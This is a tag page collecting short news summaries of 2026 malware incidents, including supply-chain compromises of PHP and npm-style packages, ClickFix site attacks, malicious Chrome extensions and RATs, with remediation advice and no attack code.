All articles tagged with #malware
GTA 6’s release hype has outpaced official pre-orders, leading to a wave of scams that promise free codes, beta keys, or exclusive trailers and deliver malware via fake installers and phishing sites. NordVPN Threat Intelligence found clone sites and trojan Android adware targeting fans, emphasizing that only official channels should be trusted for GTA 6 information and access.
Security researchers warn of a broad compromise of Laravel-Lang PHP packages (laravel-lang/lang, http-statuses, attributes, actions) that injected a malicious src/helpers.php into autoloaded vendor files. The attack involved rapid tagging of 700+ package versions in May 2026, suggesting access to the Laravel Lang release infrastructure. The embedded dropper runs on startup and delivers a ~5,900-line PHP credential stealer that exfiltrates cloud tokens, service credentials, browser data, VPN configs and more to flipboxstudio.info, encrypts results with AES-256, and self-deletes. Windows uses a Visual Basic Script launcher; Linux/macOS execute the payload via shell. Remediation includes auditing dependencies, rotating credentials, upgrading to clean versions, and monitoring for indicators of compromise.
A Based Apparel storefront tied to Kash Patel was compromised: visitors encountered a modified Cloudflare verification page and were urged to copy a code into their terminal, which installed a Mac-specific infostealer malware designed to harvest credentials, browser data, crypto extension info, and keychain items, with a suspected payment skimmer also present. The attack leveraged a malicious WordPress plugin, while initial access remains unclear. Patel has distanced himself from the store, and there’s no confirmed FBI involvement at this time.
Security researchers flag BasedApparel.com, Kash Patel’s apparel site, for hosting a ClickFix-style scam that shows a fake Cloudflare warning on macOS and instructs users to copy-paste a Terminal command. The copied text decodes to a hidden shell script that downloads malware capable of stealing browser credentials and crypto-wallet data, exfiltrating it to a hacker-controlled domain. The attack highlights how compromised legitimate sites can deliver infostealers via scareware, and Apple has added protections in macOS 26.4 against pasted Terminal commands; Based Apparel did not comment.
Researchers confirm Fast16, a 2005 malware, was designed to subvert high-precision simulations used to model nuclear explosions by feeding engineers false data, aiming to slow Iran’s nuclear program. Unlike Stuxnet's centrifuge sabotage, Fast16 targeted simulation software (LS-DYNA and AUTODYN), potentially leaving misperceived results that delayed progress without triggering real-world explosions. Analysts say the code predates Stuxnet but operated contemporaneously, likely developed by the US, Israel, or allies to buy time in negotiations.
Google Threat Intelligence Group revealed a zero-day exploit—likely AI-assisted—that enables bypassing 2FA on a popular open-source admin tool and was used in a mass exploitation campaign; the Python-based exploit shows patterns typical of LLM-generated code, and Google coordinated with the vendor to patch the flaw and disrupt the operation, while the report also highlights broader AI-enabled threats including autonomous malware and AI-assisted misuse of Gemini.
A clone of OpenAI's Privacy Filter on Hugging Face impersonated the legitimate model to distribute a Windows infostealer via a loader that downloads payloads through Base64, JSON Keeper, and PowerShell, then sets up a one-shot scheduled task to run the final malware and exfiltrate data (screenshots, crypto wallets, browser data) to a remote domain while attempting to evade detection by disabling AMSI/ETW; the repo peaked at #1 with about 244,000 downloads before being disabled, and researchers link it to similar loaders and ValleyRAT-related campaigns targeting open-source ecosystems.
From May 6–7, 2026, the official JDownloader site was compromised to redirect Windows and Linux installer downloads to malicious payloads. The Windows dropper is a Python-based RAT; the Linux installer downloads two ELF binaries, sets up persistence, and masquerades as a system process. The attack exploited CMS access but did not give attackers full OS control. Only the alternative Windows installer and Linux shell installer were affected; other downloads remained safe. Users should verify Digital Signatures (AppWork GmbH) to confirm legitimacy, avoid unsigned or differently signed files, and, if infected, reinstall the OS and reset passwords. Researchers provided IOCs for further analysis.
A new CloudZ RAT variant, equipped with a Pheno plugin, monitors active Microsoft Phone Link sessions and accesses the local Phone Link SQLite database to harvest SMS messages and one-time passwords, enabling credential theft without compromising the mobile device. Infections begin with a fake ScreenConnect updater that drops a Rust loader, followed by a .NET loader to install the RAT and establish persistence, with anti-analysis checks to evade sandboxes. Defenders are advised to avoid SMS-based OTPs in favor of non-push authenticators or hardware keys; Cisco Talos has published IO and indicators of compromise.
Attackers exploited a GitHub Actions workflow to gain access to signing keys and credentials, publishing a malicious element-data 0.23.3 package that scanned environments for sensitive data; the package was removed within ~12 hours, credentials rotated, and users are urged to upgrade to 0.23.4, purge caches, and rotate any exposed secrets.
A Mosyle Security finding describes two Mac-focused malware families, Phoenix Worm and ShadeStager, that steal developers’ keys and cloud credentials to sign malicious software as Apple‑verified. With these keys, attackers can bypass Gatekeeper and slip hidden malware onto Macs, potentially affecting over 100 million users. The risk highlights the need for caution with apps outside the Mac App Store, vigilance against phishing that targets developers, and attention to macOS warnings; developers should also protect credentials to prevent sign‑signing attacks.
Threat actors are abusing exposed n8n webhooks to run phishing campaigns, delivering malware via CAPTCHA-triggered downloads and fingerprinting victims, enabling persistence through modified RMM tools and C2 communication.
Security researchers found 108 Chrome extensions (published by five developers but controlled by a single operator) that steal Google account data and Telegram messages, with about 20,000 installations. The extensions can backdoor URLs, inject HTML, and exfiltrate Telegram Web sessions every 15 seconds, while some also capture Google sign‑in credentials and translate tools that reveal user emails. Users should audit installed extensions, log out of Telegram Web sessions, review third‑party app permissions, and avoid dubious extension listings.
Security researchers found 108 malicious Chrome extensions—designed as games, utilities, or add-ons—that quietly siphon user data and inject ads across every site. Despite different publishers, all stolen data is sent to a single command-and-control server; 54 extensions harvest Gmail addresses, full names, and Google 'sub' IDs to build a persistent profile. If you have any of these extensions installed, delete them via Chrome or Edge extensions manager. To stay safe, download only trusted extensions, inspect permissions, enable Enhanced Safe Browsing, and consider antivirus and identity protection to guard against similar threats.
Security researchers found over 100 malicious Chrome Web Store extensions from five publishers that steal Google OAuth2 Bearer tokens, harvest account data, hijack Telegram Web sessions, and run backdoors via a centralized C2; the campaign, likely a Russian MaaS operation, remains active in the store, and Google has been notified—users should uninstall any matching extensions.